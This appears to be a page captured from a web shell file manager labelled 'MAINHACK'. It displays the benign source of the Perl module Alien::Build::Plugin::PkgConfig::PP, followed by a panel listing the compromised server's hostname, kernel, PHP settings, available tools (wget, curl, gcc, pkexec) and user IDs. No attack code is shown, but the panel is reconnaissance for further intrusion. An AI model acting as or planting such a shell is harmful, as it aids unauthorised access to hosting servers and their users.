[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: PP.pm
File is not writable. Editing disabled.
package Alien::Build::Plugin::PkgConfig::PP; use strict; use warnings; use 5.008004; use Alien::Build::Plugin; use Carp (); use File::Which (); use Env qw( @PKG_CONFIG_PATH ); # ABSTRACT: Probe system and determine library or tool properties using PkgConfig.pm our $VERSION = '2.48'; # VERSION has '+pkg_name' => sub { Carp::croak "pkg_name is a required property"; }; has atleast_version => undef; has exact_version => undef; has max_version => undef; has minimum_version => undef; use constant _min_version => '0.14026'; # private for now, used by negotiator has register_prereqs => 1; sub available { !!eval { require PkgConfig; PkgConfig->VERSION(_min_version) }; } sub _cleanup { my($value) = @_; $value =~ s{\s*$}{ }; $value; } sub init { my($self, $meta) = @_; unless(defined $meta->prop->{env}->{PKG_CONFIG}) { # TODO: Better would be to to "execute" lib/PkgConfig.pm # as that should always be available, and will match the # exact version of PkgConfig.pm that we are using here. # there are a few corner cases to deal with before we # can do this. What is here should handle most use cases. my $command_line = File::Which::which('ppkg-config') ? 'ppkg-config' : File::Which::which('pkg-config.pl') ? 'pkg-config.pl' : File::Which::which('pkg-config') ? 'pkg-config' : undef; $meta->prop->{env}->{PKG_CONFIG} = $command_line if defined $command_line; } if($self->register_prereqs) { $meta->add_requires('configure' => 'PkgConfig' => _min_version); } my($pkg_name, @alt_names) = (ref $self->pkg_name) ? (@{ $self->pkg_name }) : ($self->pkg_name); $meta->register_hook( probe => sub { my($build) = @_; $build->runtime_prop->{legacy}->{name} ||= $pkg_name; $build->hook_prop->{probe_class} = __PACKAGE__; $build->hook_prop->{probe_instance_id} = $self->instance_id; require PkgConfig; my $pkg = PkgConfig->find($pkg_name); die "package @{[ $pkg_name ]} not found" if $pkg->errmsg; $build->hook_prop->{version} = $pkg->pkg_version; my $version = PkgConfig::Version->new($pkg->pkg_version); my $atleast_version = $self->atleast_version; $atleast_version = $self->minimum_version unless defined $atleast_version; if(defined $atleast_version) { my $need = PkgConfig::Version->new($atleast_version); if($version < $need) { die "package @{[ $pkg_name ]} is @{[ $pkg->pkg_version ]}, but at least $atleast_version is required."; } } if(defined $self->exact_version) { my $need = PkgConfig::Version->new($self->exact_version); if($version != $need) { die "package @{[ $pkg_name ]} is @{[ $pkg->pkg_version ]}, but exactly @{[ $self->exact_version ]} is required."; } } if(defined $self->max_version) { my $need = PkgConfig::Version->new($self->max_version); if($version > $need) { die "package @{[ $pkg_name ]} is @{[ $pkg->pkg_version ]}, but max of @{[ $self->max_version ]} is required."; } } foreach my $alt (@alt_names) { my $pkg = PkgConfig->find($alt); die "package $alt not found" if $pkg->errmsg; } 'system'; }, ); $meta->register_hook( $_ => sub { my($build) = @_; return if $build->hook_prop->{name} eq 'gather_system' && ($build->install_prop->{system_probe_instance_id} || '') ne $self->instance_id; require PkgConfig; foreach my $name ($pkg_name, @alt_names) { require PkgConfig; my $pkg = PkgConfig->find($name, search_path => [@PKG_CONFIG_PATH]); if($pkg->errmsg) { $build->log("Trying to load the pkg-config information from the source code build"); $build->log("of your package failed"); $build->log("You are currently using the pure-perl implementation of pkg-config"); $build->log("(AB Plugin is named PkgConfig::PP, which uses PkgConfig.pm"); $build->log("It may work better with the real pkg-config."); $build->log("Try installing your OS' version of pkg-config or unset ALIEN_BUILD_PKG_CONFIG"); die "second load of PkgConfig.pm @{[ $name ]} failed: @{[ $pkg->errmsg ]}" } my %prop; $prop{cflags} = _cleanup scalar $pkg->get_cflags; $prop{libs} = _cleanup scalar $pkg->get_ldflags; $prop{version} = $pkg->pkg_version; $pkg = PkgConfig->find($name, static => 1, search_path => [@PKG_CONFIG_PATH]); $prop{cflags_static} = _cleanup scalar $pkg->get_cflags; $prop{libs_static} = _cleanup scalar $pkg->get_ldflags; $build->runtime_prop->{alt}->{$name} = \%prop; } foreach my $key (keys %{ $build->runtime_prop->{alt}->{$pkg_name} }) { $build->runtime_prop->{$key} = $build->runtime_prop->{alt}->{$pkg_name}->{$key}; } if(keys %{ $build->runtime_prop->{alt} } == 1) { delete $build->runtime_prop->{alt}; } } ) for qw( gather_system gather_share ); $self; } 1; __END__ =pod =encoding UTF-8 =head1 NAME Alien::Build::Plugin::PkgConfig::PP - Probe system and determine library or tool properties using PkgConfig.pm =head1 VERSION version 2.48 =head1 SYNOPSIS use alienfile; plugin 'PkgConfig::PP' => ( pkg_name => 'libfoo', ); =head1 DESCRIPTION Note: in most case you will want to use L<Alien::Build::Plugin::PkgConfig::Negotiate> instead. It picks the appropriate fetch plugin based on your platform and environment. In some cases you may need to use this plugin directly instead. This plugin provides Probe and Gather steps for pkg-config based packages. It uses L<PkgConfig> to accomplish this task. =head1 PROPERTIES =head2 pkg_name The package name. If this is a list reference then .pc files with all those package names must be present. The first name will be the primary and used by default once installed. For the subsequent C<.pc> files you can use the L<Alien::Base alt method|Alien::Base/alt> to retrieve the alternate configurations once the L<Alien> is installed. =head2 atleast_version The minimum required version that is acceptable version as provided by the system. =head2 exact_version The exact required version that is acceptable version as provided by the system. =head2 max_version The max required version that is acceptable version as provided by the system. =head2 minimum_version Alias for C<atleast_version> for backward compatibility. =head1 METHODS =head2 available my $bool = Alien::Build::Plugin::PkgConfig::PP->available; Returns true if the necessary prereqs for this plugin are I<already> installed. =head1 SEE ALSO L<Alien::Build::Plugin::PkgConfig::Negotiate>, L<Alien::Build>, L<alienfile>, L<Alien::Build::MM>, L<Alien> =head1 AUTHOR Author: Graham Ollis E<lt>plicease@cpan.orgE<gt> Contributors: Diab Jerius (DJERIUS) Roy Storey (KIWIROY) Ilya Pavlov David Mertens (run4flat) Mark Nunberg (mordy, mnunberg) Christian Walde (Mithaldu) Brian Wightman (MidLifeXis) Zaki Mughal (zmughal) mohawk (mohawk2, ETJ) Vikas N Kumar (vikasnkumar) Flavio Poletti (polettix) Salvador Fandiño (salva) Gianni Ceccarelli (dakkar) Pavel Shaydo (zwon, trinitum) Kang-min Liu (劉康民, gugod) Nicholas Shipp (nshp) Juan Julián Merelo Guervós (JJ) Joel Berger (JBERGER) Petr Písař (ppisar) Lance Wicks (LANCEW) Ahmad Fatoum (a3f, ATHREEF) José Joaquín Atria (JJATRIA) Duke Leto (LETO) Shoichi Kaji (SKAJI) Shawn Laffan (SLAFFAN) Paul Evans (leonerd, PEVANS) Håkon Hægland (hakonhagland, HAKONH) nick nauwelaerts (INPHOBIA) =head1 COPYRIGHT AND LICENSE This software is copyright (c) 2011-2020 by Graham Ollis. This is free software; you can redistribute it and/or modify it under the same terms as the Perl 5 programming language system itself. =cut
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 699.82 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: N/A